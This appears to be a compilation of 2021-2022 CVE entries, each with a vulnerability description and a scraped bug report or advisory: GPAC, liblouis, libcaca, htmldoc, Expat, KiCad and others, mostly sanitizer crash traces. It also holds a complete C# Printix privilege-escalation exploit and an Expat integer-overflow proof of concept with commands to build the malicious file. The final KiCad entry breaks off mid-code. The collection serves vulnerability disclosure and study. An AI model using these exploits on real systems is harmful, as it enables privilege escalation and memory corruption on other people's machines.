GPAC 1.0.1 is affected by a NULL pointer dereference in gf_utf8_wcslen. (gf_utf8_wcslen is a renamed Unicode utf8_wcslen function.)

**Description**

Null Pointer Dereference in gf\_utf8\_wcslen ()

**Proof of Concept**

POC is here.

**bt**

    Program received signal SIGSEGV, Segmentation fault.
    [----------------------------------registers-----------------------------------]
    RAX: 0x24 ('$')
    RBX: 0x5555555e2870 --> 0x5555555e2840 --> 0x2000000020000000 ('')
    RCX: 0x0 
    RDX: 0x7ffff697e740 (0x00007ffff697e740)
    RSI: 0x0 
    RDI: 0x0 
    RBP: 0x2 
    RSP: 0x7fffffff7ff8 --> 0x7ffff78f7d71 (<xtra_box_dump+129>:    lea    ebx,[rax*4+0x0])
    RIP: 0x7ffff77ac884 (<gf_utf8_wcslen+4>:    cmp    WORD PTR [rdi],0x0)
    R8 : 0x0 
    R9 : 0x24 ('$')
    R10: 0x7ffff7e0cbc7 --> 0x22 ('"')
    R11: 0x7fffffff7ec7 --> 0x58c47a4e82a90030 
    R12: 0x5555555db220 --> 0x7ffffbad2c84 
    R13: 0x5555555e2920 --> 0x58747261 ('artX')
    R14: 0x5555555e28a0 --> 0x0 
    R15: 0x7ffff7e71725 --> 0x2020200058323025 ('%02X')
    EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x7ffff77ac874:  data16 nop WORD PTR cs:[rax+rax*1+0x0]
       0x7ffff77ac87f:  nop
       0x7ffff77ac880 <gf_utf8_wcslen>: endbr64 
    => 0x7ffff77ac884 <gf_utf8_wcslen+4>:   cmp    WORD PTR [rdi],0x0
       0x7ffff77ac888 <gf_utf8_wcslen+8>:   je     0x7ffff77ac8a8 <gf_utf8_wcslen+40>
       0x7ffff77ac88a <gf_utf8_wcslen+10>:  mov    rax,rdi
       0x7ffff77ac88d <gf_utf8_wcslen+13>:  nop    DWORD PTR [rax]
       0x7ffff77ac890 <gf_utf8_wcslen+16>:  add    rax,0x2
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff7ff8 --> 0x7ffff78f7d71 (<xtra_box_dump+129>:   lea    ebx,[rax*4+0x0])
    0008| 0x7fffffff8000 --> 0x5555555db650 --> 0x73747473 ('stts')
    0016| 0x7fffffff8008 --> 0x2 
    0024| 0x7fffffff8010 --> 0x0 
    0032| 0x7fffffff8018 --> 0x6458c47a4e82a900 
    0040| 0x7fffffff8020 --> 0x5555555db220 --> 0x7ffffbad2c84 
    0048| 0x7fffffff8028 --> 0x5555555da950 --> 0x0 
    0056| 0x7fffffff8030 --> 0x5555555e2920 --> 0x58747261 ('artX')
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    0x00007ffff77ac884 in gf_utf8_wcslen () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10
    gdb-peda$ bt
    #0  0x00007ffff77ac884 in gf_utf8_wcslen () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10
    #1  0x00007ffff78f7d71 in xtra_box_dump () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10
    #2  0x00007ffff78fa5f2 in gf_isom_box_dump () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10
    #3  0x00007ffff78e99f6 in gf_isom_dump () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10
    #4  0x0000555555588c15 in dump_isom_xml ()
    #5  0x000055555557c564 in mp4boxMain ()
    #6  0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x5, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318)
        at ../csu/libc-start.c:308
    #7  0x000055555556d45e in _start ()
    
    

**Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution.

CVE-2022-24577: NULL Pointer Dereference in gpac

Liblouis through 3.21.0 has a buffer overflow in compilePassOpcode in compileTranslationTable.c (called, indirectly, by tools/lou_checktable.c).

**Describe the bug**  
There is a global-buffer-overflow bug found in compilePassOpcode, can be triggered via lou\_checktable+ ASan

**To Reproduce**  
Steps to reproduce the behavior:

    export CC=clang && export CFLAGS="-fsanitize=address -g"
    ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
    ./tools/lou_checktable  POC
    
    

Output:

    ==17764==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000102f062 at pc 0x00000051d4ce bp 0x7ffdfad96390 sp 0x7ffdfad96388
    WRITE of size 2 at 0x00000102f062 thread T0
        #0 0x51d4cd in compilePassOpcode /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:1896:31
        #1 0x50f7bf in compileRule /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:3947:11
        #2 0x4ff42b in compileFile /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4660:9
        #3 0x4fbbe9 in compileTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4767:9
        #4 0x4f9bdf in getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4939:7
        #5 0x4f9061 in _lou_getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4848:2
        #6 0x4fb51f in lou_getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4860:2
        #7 0x4f4109 in main /benchmark/vulnerable/liblouis/tools/lou_checktable.c:114:16
        #8 0x7f6ff64f0bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #9 0x41b699 in _start (/benchmark/vulnerable/liblouis/tools/lou_checktable+0x41b699)
    
    0x00000102f062 is located 0 bytes to the right of global variable 'passRuleDots' defined in 'compileTranslationTable.c:1850:21' (0x102e060) of size 4098
    SUMMARY: AddressSanitizer: global-buffer-overflow /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:1896:31 in compilePassOpcode
    Shadow bytes around the buggy address:
      0x0000801fddb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fdde0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fddf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0000801fde00: 00 00 00 00 00 00 00 00 00 00 00 00[02]f9 f9 f9
      0x0000801fde10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fde50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==17764==ABORTING
    

**System**

OS: Ubuntu  
OS version : can be reproduced in 18.04/20.04  
clang version: 12.0.1 (release/12.x)  
liblouis Version : latest commit 4d73c81

**Credit**  
NCNIPC of China  
Hexhive

**POC**  
POC.zip

CVE-2022-26981: [BUG] global-buffer-overflow in lou_checktable · Issue #1171 · liblouis/liblouis

An issue was discovered in the Linux kernel before 5.16.12. drivers/net/usb/sr9700.c allows attackers to obtain sensitive information from heap memory via crafted frame lengths from a device.

CVE-2022-26966

Printix Secure Cloud Print Management through 1.3.1106.0 creates a temporary temp.ini file in a directory with insecure permissions, leading to privilege escalation because of a race condition.

    # Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation
    # Date: 3/2/2022
    # Exploit Author: Logan Latvala
    # Vendor Homepage: https://printix.net
    # Software Link:
    https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
    # Version: <= 1.3.1106.0
    # Tested on: Windows 7, Windows 8, Windows 10, Windows 11
    # CVE : CVE-2022-25090
    # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090
    
    using System;
    using System.Runtime.InteropServices;
    using System.Drawing;
    
    using System.Reflection;
    using System.Threading;
    using System.IO;
    using System.Text;
    using System.Resources;
    using System.Diagnostics;
    
    //Assembly COM for transparent creation of the application.
    
    //End of Assembly COM For Transparent Creation usage.
    public class Program
    {
    	//Initiator class for the program, the program starts on the main method.
    	public static void Main(string[] args)
    	{
    		//Console.SetWindowSize(120,30);
    		//Console.SetBufferSize(120,30);
    		Console.ForegroundColor = ConsoleColor.Blue;
    		Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    		Console.WriteLine("├			  oo dP                           dP                                ");
    		Console.ForegroundColor = ConsoleColor.Red;
    		Console.WriteLine("├			     88                           88                                ");
    		Console.ForegroundColor = ConsoleColor.Green;
    		Console.WriteLine("├			  dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. ");
    		Console.ForegroundColor = ConsoleColor.Blue;
    		Console.WriteLine("├			  88 88'  `88 88'  `88    .d8P'   88   88ooood8 88'`88'`88 88'  `88 ");
    		Console.ForegroundColor = ConsoleColor.Yellow;
    		Console.WriteLine("├			  88 88    88 88.  .88  .Y8P      88   88.  ... 88  88  88 88.  .88 ");
    		Console.ForegroundColor = ConsoleColor.Magenta;
    		Console.WriteLine("├			  dP dP    dP `88888P8 d888888P   dP   `88888P' dP  dP  dP 88Y888P' ");
    		Console.WriteLine("├			                                                           88       ");
    		Console.WriteLine("├			                                                           dP       ");
    		Console.ForegroundColor = ConsoleColor.Blue;
    		Console.Write("├			                        For ");
    		Console.ForegroundColor = ConsoleColor.Magenta;
    		Console.Write("Printix ");
    		Console.ForegroundColor = ConsoleColor.Blue;
    		Console.Write("Services                       Designed By Logan Latvala\n");
    		Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    		Thread.Sleep(3000);
    		string filesH = "";
    		Console.WriteLine("Drag and drop a payload onto this application for execution.");
    		try
    		{
    			if (args[0]?.Length >0)
    			{
    				Console.WriteLine("File Added: " + args[0]);
    			}
    			
    		}
    		catch (Exception e)
    		{
    			Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n");
    			Console.ForegroundColor = ConsoleColor.Red;
    			Console.WriteLine(e);
    			Console.ReadLine();
    			Environment.Exit(40);
    		}
    
    
    		Console.WriteLine("\n We're going to look for your printix installer, one moment...");
    		string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories);
    
    		double mCheck = 1.00;
    
    		string trueInstaller = "";
    		//Starts to enumerate window's installer directory for an author with the name of printix.
    		foreach (string path in installerSearch)
    		{
    			Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length);
    			Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done.");
    			if (readFileProperties(path, "Printix"))
    			{
    				trueInstaller = path;
    				Console.WriteLine("We've found your installer, we'll finish enumeration.");
    				goto MGMA;
    			}
    			mCheck++;
    		}
    	//Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely.
    	MGMA:
    		if (trueInstaller == "")
    		{
    			Console.WriteLine("We can't find your installer, you are not vulnerable.");
    			Thread.Sleep(2000);
    			Environment.Exit(12);
    		}
    		Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    		Console.WriteLine("├ We are starting to enumerate your temporary directory.");
    		Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    
    		//Start a new thread here for enumeration.
    
    		Thread t = new Thread(() => newTempThread(filesH, args));
    		t.Start();
    
    
    
    		Process.Start(trueInstaller);
    
    
    
    		Console.WriteLine("All done.");
    		Console.ReadLine();
    	}
    	public static void newTempThread(string filesH, string[] args)
    	{
    		while (true)
    		{
    			try
    			{
    				//Starts the inheriting process for printix, in which scans for the files and relays their contents.
    				string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories);
    				if (!string.IsNullOrEmpty(files[0]))
    				{
    					foreach (string fl in files)
    					{
    						if (!filesH.Contains(fl))
    						{
    
    							//filesH += " " + fl;
    							string[] fileText = File.ReadAllLines(fl);
    							int linerc = 0;
    							foreach (string liners in fileText)
    							{
    
    								if (liners.Contains("SetupFileName"))
    								{
    
    									//Most likely the temporary directory for setup, which presents it properly.
    									Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    									Console.WriteLine("├ " + fl);
    									fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\"";
    									Console.WriteLine("├ " + fileText[linerc] + "");
    									Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
    									Console.WriteLine("│");
    									filesH += " " + fl;
    
    									File.WriteAllText(fl, string.Empty);
    									File.WriteAllLines(fl, fileText);
    								}
    								linerc++;
    							}
    						}
    					}
    				}
    			}
    			catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); }
    
    			Thread.Sleep(20);
    		}
    	}
    	public static bool readFileProperties(string file, string filter)
    	{
    		System.Diagnostics.Process process = new System.Diagnostics.Process();
    		System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
    		startInfo.UseShellExecute = false;
    		startInfo.RedirectStandardOutput = true;
    		startInfo.FileName = "CMD.exe";
    		startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\"";
    		process.StartInfo = startInfo;
    		process.Start();
    		string output = process.StandardOutput.ReadToEnd();
    		process.WaitForExit();
    		if (output.Contains(filter)) { return true; }
    		else { return false; }
    		//wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version
    	}
    }

CVE-2022-25090: Offensive Security’s Exploit Database Archive

libcaca is affected by a Divide By Zero issue via img2txt, which allows a remote malicious user to cause a Denial of Service

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

kdsjZh opened this issue

Feb 24, 2022

· 3 comments

Open

**\[BUG\] Divide by zero in img2txt #65**

kdsjZh opened this issue

Feb 24, 2022

· 3 comments

**Comments**

version: latest commit f42aa68  
driver: src/img2txt  
Environment: ubuntu 22.04, clang-12  
step to reproduce:

    export CFLAGS="-fsanitize=address -g"
    export CC=clang
    ./bootstrap
    ./configure 
    make -j8
    ./src/img2txt ./divide_by_0.seed
    

Sanitizer output:

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==25214==ERROR: AddressSanitizer: FPE on unknown address 0x0000004d0433 (pc 0x0000004d0433 bp 0x7fff1cb39010 sp 0x7fff1cb38ee0 T0)
        #0 0x4d0433 in main /benchmarks/libcaca/src/img2txt.c:183:42
        #1 0x7fa2270f9d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x2dd8f)
        #2 0x7fa2270f9e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2de3f)
        #3 0x421944 in _start (/benchmarks/libcaca/src/img2txt+0x421944)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: FPE /benchmarks/libcaca/src/img2txt.c:183:42 in main
    ==25214==ABORTING
    
    

#POC  
divide\_by\_0.zip

##Credit  
Han Zheng  
NCNIPC of China  
Hexhive

Thank you, reading the code it could happen when given a valid image of width 0 (probably the case here), but also with any image if passing -y 0.

How's this going to be fixed?  
I added a check for i->w and/or i->h being 0, issuing an error message ("image size is 0") and setting lines and cols to 0 (caca_set_canvas_size can handle this).  
Obviously caca_export_canvas_to_memory then chokes on this but this is handled already. I only then also changed the format in the error message to format?format:"ansi".

CVE-2022-0856: [BUG] Divide by zero in img2txt · Issue #65 · cacalabs/libcaca

Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file.

While fuzzing htmldoc I found a segmentation fault in the copy\_image() function, in epub.cxx:1221

testcase:(zipped so GitHub accepts it)  
crash01.html.zip

reproduced by running:

    htmldoc -f demo.epub  crash01.html 
    

htmldoc Version v1.9.11 git \[master 0f9d20\]  
tested on:

OS :Ubuntu 20.04.1 LTS  
kernel: 5.4.0-53-generic  
compiler: clang version 10.0.0-4ubuntu1  
Target: x86\_64-pc-linux-gnu

OS : macOS Catalina 10.15.5(19F101) MacBook Pro (Retina, 13-inch, Early 2015)  
compiler: Apple clang version 11.0.0 (clang-1100.0.33.17)

Install from snap or download mac dmg don't crash for this testcase.

*   addresssanitizer

    ==3252595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000042fc30 bp 0x7ffe6ab48d00 sp 0x7ffe6ab484a0 T0)
    ==3252595==The signal is caused by a READ memory access.
    ==3252595==Hint: address points to the zero page.
        #0 0x42fc30 in strcmp (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30)
        #1 0x7f70ce1fd7c7 in bsearch /build/glibc-ZN95T4/glibc-2.31/stdlib/../bits/stdlib-bsearch.h:33:23
        #2 0x4c81b0 in copy_image(_zipc_s*, char const*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1221:25
        #3 0x4c8434 in copy_images(_zipc_s*, tree_str*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1288:11
        #4 0x4c71c5 in epub_export /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:211:13
        #5 0x4d0f13 in main /home/chiba/check_crash/htmldoc/htmldoc/htmldoc.cxx:1291:3
        #6 0x7f70ce1dd0b2 in __libc_start_main /build/glibc-ZN95T4/glibc-2.31/csu/../csu/libc-start.c:308:16
        #7 0x41c5fd in _start (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x41c5fd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30) in strcmp
    ==3252595==ABORTING
    

*   gdb

    ─[ DISASM ]─
     ► 0x7ffff7de1ed7 <__strcmp_avx2+887>    vmovdqu ymm1, ymmword ptr [rdi + rdx]
       0x7ffff7de1edc <__strcmp_avx2+892>    vpcmpeqb ymm0, ymm1, ymmword ptr [rsi + rdx]
       0x7ffff7de1ee1 <__strcmp_avx2+897>    vpminub ymm0, ymm0, ymm1
       0x7ffff7de1ee5 <__strcmp_avx2+901>    vpcmpeqb ymm0, ymm0, ymm7
       0x7ffff7de1ee9 <__strcmp_avx2+905>    vpmovmskb ecx, ymm0
       0x7ffff7de1eed <__strcmp_avx2+909>    test   ecx, ecx
       0x7ffff7de1eef <__strcmp_avx2+911>    jne    __strcmp_avx2+848 <__strcmp_avx2+848>
        ↓
       0x7ffff7de1eb0 <__strcmp_avx2+848>    add    rdi, rdx
       0x7ffff7de1eb3 <__strcmp_avx2+851>    add    rsi, rdx
       0x7ffff7de1eb6 <__strcmp_avx2+854>    tzcnt  edx, ecx
       0x7ffff7de1eba <__strcmp_avx2+858>    movzx  eax, byte ptr [rdi + rdx]
    ─[ STACK ]──
    00:0000│ rsp  0x7fffffffd948 —▸ 0x7ffff7ca27c8 (bsearch+88) ◂— test   eax, eax
    01:0008│      0x7fffffffd950 —▸ 0x555555aa6bc0 —▸ 0x555555aa6fd0 —▸ 0x7ffff7e47000 (main_arena+1152) —▸ 0x7ffff7e46ff0 (main_arena+1136) ◂— ...
    02:0010│      0x7fffffffd958 ◂— 0x8
    03:0018│      0x7fffffffd960 ◂— 0x0
    04:0020│      0x7fffffffd968 —▸ 0x555555aa8bf0 —▸ 0x555555aa8af0 —▸ 0x555555aa7f40 —▸ 0x555555aa65c0 ◂— ...
    05:0028│      0x7fffffffd970 —▸ 0x555555aa9200 —▸ 0x555555aa6340 ◂— 0x5555fbad2480
    06:0030│      0x7fffffffd978 —▸ 0x555555aa8fe0 ◂— 0x616d693a61746164 ('data:ima')
    07:0038│      0x7fffffffd980 —▸ 0x5555555cd04b ◂— 0x22263e3c00435253 /* 'SRC' */
    
    pwndbg> bt
    #0  __strcmp_avx2 () at ../sysdeps/x86_64/multiarch/strcmp-avx2.S:736
    #1  0x00007ffff7ca27c8 in __GI_bsearch (__key=0x7fffffffd9a0, __base=0x555555aa6bc0, __nmemb=<optimized out>, __size=8, __compar=0x55555555d609 <compare_images(char**, char**)>) at ../bits/stdlib-bsearch.h:33
    #2  0x000055555555d6ed in copy_image (zipc=zipc@entry=0x555555aa9200, filename=filename@entry=0x555555aa8fe0 "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAA,BlBMVEUAAAD///+l2Z/dAAAAM0lEQVR4nGP4/5/h/1+G/58ZDrAz3D/McH8yw83NDDeNGe4Ug9CLzwz3gVLMDA/A6P9/#FGGF\207jOXZtQAAAAAElFTkSuQmCC") at epub.cxx:1235
    #3  0x000055555555d81c in copy_images (zipc=zipc@entry=0x555555aa9200, t=0x555555aa8bf0, t@entry=0x555555aa65c0) at epub.cxx:1288
    #4  0x000055555555e813 in epub_export (document=0x555555aa65c0, toc=0x555555aa6760) at epub.cxx:211
    #5  0x000055555555d448 in main (argc=<optimized out>, argc@entry=4, argv=argv@entry=0x7fffffffe4e8) at htmldoc.cxx:1291
    #6  0x00007ffff7c820b3 in __libc_start_main (main=0x55555555af20 <main(int, char**)>, argc=4, argv=0x7fffffffe4e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe4d8) at ../csu/libc-start.c:308
    #7  0x000055555555d54e in _start () at htmldoc.cxx:1315
    
    

The bug locate in epub.cxx:1221 compare\_images. The arguments of compare\_images didn't checked so strcmp() lead a segfault due to to null pointer.

Reporter: chiba of topsec alphalab

CVE-2021-26948: SEGV on unknown address 0x000000000000   · Issue #410 · michaelrsweet/htmldoc

A vulnerability in Qlik Sense Enterprise on Windows could allow an remote attacker to enumerate domain user accounts. An attacker could exploit this vulnerability by sending authentication requests to an affected system. A successful exploit could allow the attacker to compare the response time that are returned by the affected system to determine which accounts are valid user accounts. Affected systems are only vulnerable if they have LDAP configured.

CVE-2022-0564: Qlik Sense Enterprise on Windows Release notes - November 2021 Initial Release to Patch 16

In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames.

It is possible to use an integer overflow in storeRawNames for out of  
boundary heap writes. Default configuration is affected. If compiled  
with XML\_UNICODE then the attack does not work. Compiling with  
\-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m\_buffer expansion logic.  
Even though the initial size of m\_buffer is a power of two, eventually  
it can end up a little bit lower, thus allowing allocations very close  
to INT\_MAX (since INT\_MAX/2 can be surpassed). This means that tag  
names can be parsed which are almost INT\_MAX in size.

Unfortunately (from an attacker point of view) INT\_MAX/2 is also a  
limitation in string pools. Having a tag name of INT\_MAX/2 characters  
or more is not possible.

Expat can convert between different encodings. UTF-16 documents which  
contain only ASCII representable characters are twice as large as their  
ASCII encoded counter-parts.

The proof of concept works by taking these three considerations into  
account:

1.  Move the m\_buffer size slightly below a power of two by having a  
    short root node . This allows the m\_buffer to grow very close  
    to INT\_MAX.
2.  The string pooling forbids tag names longer than or equal to  
    INT\_MAX/2, so keep the attack tag name smaller than that.
3.  To be able to still overflow INT\_MAX even though the name is  
    limited at INT\_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag  
    which only contains ASCII characters. UTF-16 always stores two  
    bytes per character while the tag name is converted to using only  
    one. Our attack node byte count must be a bit higher than  
    2/3 INT\_MAX so the converted tag name is around INT\_MAX/3 which  
    in sum can overflow INT\_MAX.

Thanks to our small root node, m\_buffer can handle 2/3 INT\_MAX bytes  
without running into INT\_MAX boundary check. The string pooling is  
able to store INT\_MAX/3 as tag name because the amount is below  
INT\_MAX/2 limitation. And creating the sum of both eventually overflows  
in storeRawNames.

Proof of Concept:

1.  Compile expat with -fsanitize=address.
    
2.  Create Proof of Concept binary which iterates through input  
    file 16 MB at once for better performance and easier integer  
    calculations:
    

    cat > poc.c << EOF
     #include <err.h>
     #include <expat.h>
     #include <stdlib.h>
     #include <stdio.h>
    
     #define CHUNK (16 * 1024 * 1024)
     int main(int argc, char *argv[]) {
       XML_Parser parser;
       FILE *fp;
       char *buf;
       int i;
    
       if (argc != 2)
         errx(1, "usage: poc file.xml");
       if ((parser = XML_ParserCreate(NULL)) == NULL)
         errx(1, "failed to create expat parser");
       if ((fp = fopen(argv[1], "r")) == NULL) {
         XML_ParserFree(parser);
         err(1, "failed to open file");
       }
       if ((buf = malloc(CHUNK)) == NULL) {
         fclose(fp);
         XML_ParserFree(parser);
         err(1, "failed to allocate buffer");
       }
       i = 0;
       while (fread(buf, CHUNK, 1, fp) == 1) {
         printf("iteration %d: XML_Parse returns %d\n", ++i,
           XML_Parse(parser, buf, CHUNK, XML_FALSE));
       }
       free(buf);
       fclose(fp);
       XML_ParserFree(parser);
       return 0;
     }
    EOF
    gcc -fsanitize=address -lexpat -o poc poc.c
    

3.  Construct specially prepared UTF-16 XML file:

    dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
    echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
    echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
    iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
    

4.  Run proof of concept:

CVE-2022-25315: [CVE-2022-25315] lib: Prevent integer overflow in storeRawNames by ferivoz · Pull Request #559 · libexpat/libexpat

A use-after-free flaw was found in the Linux kernel’s Bluetooth subsystem in the way user calls connect to the socket and disconnect simultaneously due to a race condition. This flaw allows a user to crash the system or escalate their privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

CVE-2021-3752: [PATCH 5.15 187/917] Bluetooth: fix use-after-free error in lock_sock_nested()

A stack-based buffer overflow vulnerability exists in the Gerber Viewer gerber and excellon ReadXYCoord coordinate parsing functionality of KiCad EDA 6.0.1 and master commit de006fc010. A specially-crafted gerber or excellon file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

Multiple stack-based buffer overflow vulnerabilities exist in the Gerber Viewer gerber and excellon coordinates parsing functionality of KiCad EDA 6.0.1 and master commit de006fc010. A specially-crafted gerber or excellon file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

KiCad EDA 6.0.1  
KiCad EDA master commit de006fc010

**Product URLs**

KiCad EDA - https://www.kicad.org/

**CVSSv3 Score**

7.8 - CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**Details**

KiCad is a cross-platform open-source software for electronics design automation, used to design and simulate electronic hardware. It offers several tools like schematic and symbol editor, PCB and footprint editor, Gerber viewer and others.

KiCad's Gerber Viewer is found in a separate binary called gerbview and allows the viewing of Gerber files, Excellon files and Gerber job files, optionally contained in zip archives.

When opening a Gerber file, the method GERBER_FILE_IMAGE::LoadGerberFile in readgerb.cpp is called:

    // size of a single line of text from a gerber file.
    // warning: some files can have *very long* lines, so the buffer must be large.
    #define GERBER_BUFZ 1000000
    // A large buffer to store one line
    static char lineBuffer[GERBER_BUFZ+1];  // [7]
    
    bool GERBER_FILE_IMAGE::LoadGerberFile( const wxString&amp; aFullFileName )
    {
        int      G_command = 0;        // command number for G commands like G04
        int      D_commande = 0;       // command number for D commands like D02
        char*    text;
    
        ClearMessageList( );
        ResetDefaultValues();
    
        // Read the gerber file */
        m_Current_File = wxFopen( aFullFileName, wxT( &#34;rt&#34; ) );
    
        if( m_Current_File == nullptr )
            return false;
    
        m_FileName = aFullFileName;
    
        LOCALE_IO toggleIo;
    
        wxString msg;
    
        while( true )
        {
            if( fgets( lineBuffer, GERBER_BUFZ, m_Current_File ) == nullptr )  // [1]
                break;
    
            m_LineNum++;
            text = StrPurge( lineBuffer );
    
            while( text &amp;&amp; *text )
            {
                switch( *text )
                {
                case &#39; &#39;:
                case &#39;\r&#39;:
                case &#39;\n&#39;:
                    text++;
                    break;
    
                case &#39;*&#39;:       // End command
                    m_CommandState = END_BLOCK;
                    text++;
                    break;
    
                case &#39;M&#39;:       // End file
                    m_CommandState = CMD_IDLE;
                    while( *text )
                        text++;
                    break;
    
                case &#39;G&#39;:    /* Line type Gxx : command */
                    G_command = GCodeNumber( text );
                    Execute_G_Command( text, G_command );
                    break;
    
                case &#39;D&#39;:       /* Line type Dxx : Tool selection (xx &gt; 0) or
                                 * command if xx = 0..9 */
                    D_commande = DCodeNumber( text );
                    Execute_DCODE_Command( text, D_commande );
                    break;
    
                case &#39;X&#39;:
                case &#39;Y&#39;:                   /* Move or draw command */
                    m_CurrentPos = ReadXYCoord( text );                        // [2]
